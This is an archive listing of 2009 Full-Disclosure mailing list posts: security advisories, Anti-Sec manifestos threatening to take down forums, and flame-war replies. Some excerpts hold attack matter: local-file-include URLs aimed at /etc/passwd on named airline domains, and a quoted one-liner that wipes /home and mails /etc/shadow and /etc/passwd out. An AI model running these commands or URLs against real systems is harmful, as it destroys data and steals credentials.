[Full-disclosure] [ GLSA 200907-14 ] Rasterbar libtorrent: Directory traversal

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200907-14 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - -

[Full-disclosure] The Anti-Sec Movement - Clarrifying what it means. Our Targets Remain HackForums.net and Milw0rm.com

Dear Reader, In light of recent events, we have decided to clarify exactly what the Anti-Sec Movement is, and who we really are. Firstly, Anti-Sec is NOT an individual clan or group; as the name implies, we are a movement - a protest against White Hat Hackers and Full-Disclosure, if you will. Much

Re: [Full-disclosure] n3td3v is posting as ant-sec

I didn't know n3td3v twitted about himself in the third person, thanks for giving me a good laugh today :) On Thu, Jul 16, 2009 at 6:00 PM, Ureleet wrote: > N3td3v made comment earlier today on Twitter about messing with the > mind of his enemies. Gave him a dose of his own medicine. Now he is >

[Full-disclosure] Linux 2.6.30+/SELinux/RHEL5 test kernel 0day, exploiting the unexploitable

Title says it all, exploit is at: http://grsecurity.net/~spender/cheddar_bay.tgz Everything is described and explained in the exploit.c file. I exploit a bug that by looking at the source is unexploitable; I defeat the null ptr dereference protection in the kernel on both systems with SELinux and

[Full-disclosure] American Airlines (multiple domains) Local File Include

American Airlines' domains have been vulnerable to Local file Include (I wonder if anyone has flown free using this) http://www.aa.com.do/aa/i18nForward.do?p=../../../../../../../../../../../../../../../../../../../../../../../etc/passwd http://www.aa.com.pe/aa/i18nForward.do?p=../../../../../../.

Re: [Full-disclosure] Anti-Sec - We have Terminated Blackhat-forums. Are you scared now HackForums?

How has it changed? ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Anti-Sec - We're not really Anti-Sec! Sorry Hackforums. It was all a big joke by anonymous!

Gee, we didn't see that coming or anything. On Jul 16, 2009, at 2:32 PM, Ant-Sec Movement wrote: > Yes, that's right, we're not really Anti-Sec. > > We have no 0-day exploits. > > We did not hack ImageShack or Blackhat-forums or Astalavista. That > was the real Anti-Sec whomever they are. > >

[Full-disclosure] Anti-Sec - We're not really Anti-Sec! Sorry Hackforums. It was all a big joke by anonymous!

Yes, that's right, we're not really Anti-Sec. We have no 0-day exploits. We did not hack ImageShack or Blackhat-forums or Astalavista. That was the real Anti-Sec whomever they are. It was all a big joke. But our goal was achieved. We caused a huge stir on Hackforums.net. We've made them look li

Re: [Full-disclosure] Anti-Sec - We have Terminated Blackhat-forums. Are you scared now HackForums?

-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 nope i think these guys they miss the darkcore underground warez era when the 0-day stuff was able only for the few and the really good underground ppl. Well somehow i miss the 90s too but thats life ,things changing ! ___ / /

Re: [Full-disclosure] n3td3v is posting as ant-sec

N3td3v made comment earlier today on Twitter about messing with the mind of his enemies. Gave him a dose of his own medicine. Now he is panicing. Twitter.com/n3td3v Got u kid. Fuxk off. O and don't follow him. He likes it. In fact, if u r a n3td3v follower unsub from his bullshit. I don't know

Re: [Full-disclosure] Ant-Sec - We are going to terminate Hackforums.net and Milw0rm.com - New Apache 0-day exploit uncovered

-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 I've seen enough RAID controllers take a crap all over all the disks far too many times in my career. http://www.channelregister.co.uk/2009/03/23/carbonite_sues_promise/ Sound familiar? On Thu, 16 Jul 2009 13:52:16 -0400 valdis.kletni...@vt.ed

Re: [Full-disclosure] Anti-Sec - We have Terminated Blackhat-forums. Are you scared now HackForums?

On Jul 16, 2009, at 3:00 AM, Ant-Sec Movement wrote: > The Anti-Sec movement is not just one person. We are a group of > people from all over the world. We are almost a culture unto > ourselves. We are threaded throughout the spokes of everyday life. So basically, you are legion, for you are

Re: [Full-disclosure] Anti-Sec - We have Terminated Blackhat-forums. Are you scared now HackForums?

No. It is the Illuminati and their New World Order On Jul 16, 2009, at 5:51 AM, Ureleet wrote: > n3td3v? iz that u? lying again? do i need 2 bust u out? > > On Thu, Jul 16, 2009 at 6:00 AM, Ant-Sec > Movement wrote: >> The Anti-Sec movement is not just one person. We are a group of >> pe

[Full-disclosure] [SECURITY] [DSA 1836-1] New fckeditor packages fix arbitrary code execution

-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - Debian Security Advisory DSA-1836-1 secur...@debian.org http://www.debian.org/security/ Moritz Muehlenhoff July 16, 2009

Re: [Full-disclosure] Anti-Sec - We have terminated blackhat-forums.com. Are you scared now Hackforums.net?

On Thu, 16 Jul 2009 19:18:33 +1000, Ant-Sec Movement said: > Get trusted. > Trust no one. What happens if the guy who's trust you are trying to get happens to believe in this as well? Basic theory of protocols (both computer and human): To be successful, they must be capable of self-interoperati

Re: [Full-disclosure] Ant-Sec - We are going to terminate Hackforums.net and Milw0rm.com - New Apache 0-day exploit uncovered

On Wed, 15 Jul 2009 12:41:02 BST, mrx said: > ii) Backed up and mirrored the content so that they could be back up in > 24 hours. Strictly speaking, any site that gives a flying f**k in a rolling donut about their availability should be doing this *anyhow*, even if they aren't worried about getti

Re: [Full-disclosure] n3td3v is posting as ant-sec

On Thu, Jul 16, 2009 at 2:54 PM, Ureleet wrote: > careful.  n3td3v has found his way back onto the list.  he is now > posting as ant-sec.  he is hacking and spreading disinformation on > full-d. Interesting theory, but do you have any evidence that backs this up? I'm not so sure if n3td3v is back,

[Full-disclosure] [ GLSA 200907-13 ] PulseAudio: Local privilege escalation

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200907-13 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - -

Re: [Full-disclosure] n3td3v is posting as ant-sec

Hehehe, netdev? For real?. He is the Anti-sec. I think thats wrong On Thu, Jul 16, 2009 at 1:35 PM, Benjamin Cance wrote: > now we know who antisec are/is, i'm going to bed > > Charles Majola wrote: >> HAH! >> >> I knew it >> >> On Thu, Jul 16, 2009 at 2:54 PM, Ureleet wrote: >> >>> carefu

Re: [Full-disclosure] n3td3v is posting as ant-sec

Ureleet wrote: > careful. n3td3v has found his way back onto the list. he is now > posting as ant-sec. he is hacking and spreading disinformation on > full-d. > > careful who you talk 2, he has many names. Common, n3td3v couldn't hack in any form. However much we might disagree with anti-sec they

Re: [Full-disclosure] n3td3v is posting as ant-sec

now we know who antisec are/is, i'm going to bed Charles Majola wrote: > HAH! > > I knew it > > On Thu, Jul 16, 2009 at 2:54 PM, Ureleet wrote: > >> careful. n3td3v has found his way back onto the list. he is now >> posting as ant-sec. he is hacking and spreading disinformation on >> full-d.

Re: [Full-disclosure] n3td3v is posting as ant-sec

HAH! I knew it On Thu, Jul 16, 2009 at 2:54 PM, Ureleet wrote: > careful.  n3td3v has found his way back onto the list.  he is now > posting as ant-sec.  he is hacking and spreading disinformation on > full-d. > > careful who you talk 2, he has many names. > >

Re: [Full-disclosure] Anti-Sec - We have Terminated Blackhat-forums. Are you scared now HackForums?

Apparently N3tty has returned, or, God forbid, he has procreated My money is on a return, given the Gmail addy 2009/7/16 Ant-Sec Movement > The Anti-Sec movement is not just one person. We are a group of people from > all over the world. We are almost a culture unto ourselves. We are threaded >

Re: [Full-disclosure] n3td3v is posting as ant-sec

I was about to tarball my directory of XSS 0days for them... Thanks Ureleet! /typical fd post -Travis On Thu, Jul 16, 2009 at 8:54 AM, Ureleet wrote: > careful.  n3td3v has found his way back onto the list.  he is now > posting as ant-sec.  he is hacking and spreading disinformation on > full-d

[Full-disclosure] n3td3v is posting as ant-sec

careful. n3td3v has found his way back onto the list. he is now posting as ant-sec. he is hacking and spreading disinformation on full-d. careful who you talk 2, he has many names. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.or

Re: [Full-disclosure] Anti-Sec - We have Terminated Blackhat-forums. Are you scared now HackForums?

-[u a *Rules of Engagement*: Don't get too cocky. Don't underestimate anyone. These frequent posts sound as if you are in violation of your own RoE. Ureleet wrote: > n3td3v? iz that u? lying again? do i need 2 bust u out? > > On Thu, Jul 16, 2009 at 6:00 AM, Ant-Sec > Mov

Re: [Full-disclosure] Update: [TZO-06-2009] IBM Proventia - Generic bypass (Limited disclosure - see details)

Hi Vladimir, Please understand that I will not enter that discussion any longer. Please note that : V3D> is not malware/intrusion or malware in the form unused in-the-wild V3D> is not vulnerability. Is false. It is recognised malware, else the test woulnd't make sense - obviousl

Re: [Full-disclosure] Anti-Sec - We have Terminated Blackhat-forums. Are you scared now HackForums?

n3td3v? iz that u? lying again? do i need 2 bust u out? On Thu, Jul 16, 2009 at 6:00 AM, Ant-Sec Movement wrote: > The Anti-Sec movement is not just one person. We are a group of people from > all over the world. We are almost a culture unto ourselves. We are threaded > throughout the spokes of

Re: [Full-disclosure] Update: [TZO-06-2009] IBM Proventia - Generic bypass (Limited disclosure - see details)

Thierry, I think inability of antivirus / intrusion detection to catch something that is not malware/intrusion or malware in the form unused in-the-wild is not vulnerability. Antivirus (generally) gives no preventive protection. They can add signatures for your PoCs to their database

Re: [Full-disclosure] Anti-Sec - We have Terminated Blackhat-forums. Are you scared now HackForums?

The Anti-Sec movement is not just one person. We are a group of people from all over the world. We are almost a culture unto ourselves. We are threaded throughout the spokes of everyday life. We have committed no crimes - our endeavors will ultimately cut down computer crime to some degree. The amo

Re: [Full-disclosure] Anti-Sec - We have Terminated Blackhat-forums. Are you scared now HackForums?

Seriously, you're as delusional as these radical movements who blow up buildings and kill people preaching how they feel the "West" is wrong and old ways are best. I see a lot of parallels between them and you. You need help, you need a new hobby. Taking down these sites is as productive as masturb

[Full-disclosure] Anti-Sec - We have Terminated Blackhat-forums. Are you scared now HackForums?

Blend in. Get trusted. Trust no one. Own everyone. Disclose nothing. Destroy everything. Take back the scene. Never sell out, never surrender. Get in as anonymous, Leave with no trace. -- Dear Jesse Labrocca (Omniscient) and Hackforums.net, The Anti-Sec movement has o

[Full-disclosure] ANT-SEC

-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ____ _ / | / | / /_ __/ / ___// / / / /| | / |/ / / /_\__ \/ __/ / / / ___ |/ /| / / /_/__/ / /___/ /___ /_/ |_/_/ |_/ /_/ //_/\/ WE ARE

[Full-disclosure] Anti-Sec - We have terminated blackhat-forums.com. Are you scared now Hackforums.net?

Blend in. Get trusted. Trust no one. Own everyone. Disclose nothing. Destroy everything. Take back the scene. Never sell out, never surrender. Get in as anonymous, Leave with no trace. -- Dear Jesse Labrocca (Omniscient) and Hackforums.net, The Anti-Sec movement has of

[Full-disclosure] Vulnerable DLLs distributed with Terratec HomeCinema 6.3

Once again a sad story of poor software "engineering", missing QA and a TOTALLY unresponsive vendor. The current version 6.3 of Terratec's TV software HomeCinema from 2009-05-05 installs outdated and vulnerable .DLL

[Full-disclosure] Anti-Sec - We have terminated blackhat-forums.com. Are you scared now Hackforums.net?

Blend in. Get trusted. Trust no one. Own everyone. Disclose nothing. Destroy everything. Take back the scene. Never sell out, never surrender. Get in as anonymous, Leave with no trace. -- Dear Jesse Labrocca (Omniscient) and Hackforums.net, The Anti-Sec movement has of

Re: [Full-disclosure] seriously, your code

Hi, > /bin/rm -rf /home/*;clear;echo bl4ckh4t,hehecat /etc/shadow |mail > full-disclosure@lists.grok.org.uk cat /etc/passwd |mail > full-disclosure@lists.grok.org.uk > > first off if you want to do damage rm -R dumb ass, the one you posted > only removes files in /home > perhaps it was *desi

Re: [Full-disclosure] Ant-Sec - We are going to terminate Hackforums.net and Milw0rm.com - New Apache 0-day exploit uncovered

webDEViL wrote: > lol, what makes you think they will fall for it? > > On Thu, Jul 16, 2009 at 9:01 AM, anti-scared- sheep > mailto:securyourbr...@gmail.com>> wrote: > > Hey she...@fd, > Stop being scared about theses kids, they fucking sucks! > you shoudn't have taken LSD, makes you p